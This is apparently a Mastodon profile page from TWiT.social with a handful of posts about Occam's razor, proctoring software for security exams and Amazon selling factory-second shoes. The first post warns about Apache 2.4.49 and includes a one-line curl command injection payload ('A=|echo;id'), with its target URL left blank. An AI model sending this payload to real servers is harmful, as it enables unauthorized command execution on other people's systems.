Apache 2.4.49 has a huge security problem: curl --data "A=|echo;id" '' -vv

I suggest a rework of Occam's razor: rather than the simplest answer being correct, the simplest answer is likely a good enough model to work from.

Show thread

It means that anytime you think a problem or system is simple, you're interacting with an abstraction or model of reality. There is limitless complexity to be had, but sometimes the simple model is good enough

Show thread

Today I wondered if security cert exams have finally become worth taking seriously in the last decade.

They all require Win/Mac machines to run their proctoring malware on, even for Linux Security exams.

I'll look again in another decade.

As convenient as Amazon is, there is a dark side. I need a new pair of brown dress shoes, and found some Allen Edmonds that I really liked. Full price, but true A&Es are worth it, and these were sold by Amazon, not a third party seller. Start reading the reviews, and guess what. They are selling factory seconds at full price.


A Mastodon instance dedicated to TWiT listeners. Think of a Twitter just for geeks, sharing content with other Mastodon servers all over the world. If you're a TWiT fan, consider this your home! Our TWiT Forums live at TWiT Community. Post conversation starters there. TWiT.social is for quick thoughts, fun pictures, and other ephemera. Keep it clean, keep it friendly. Looking forward to your Toots!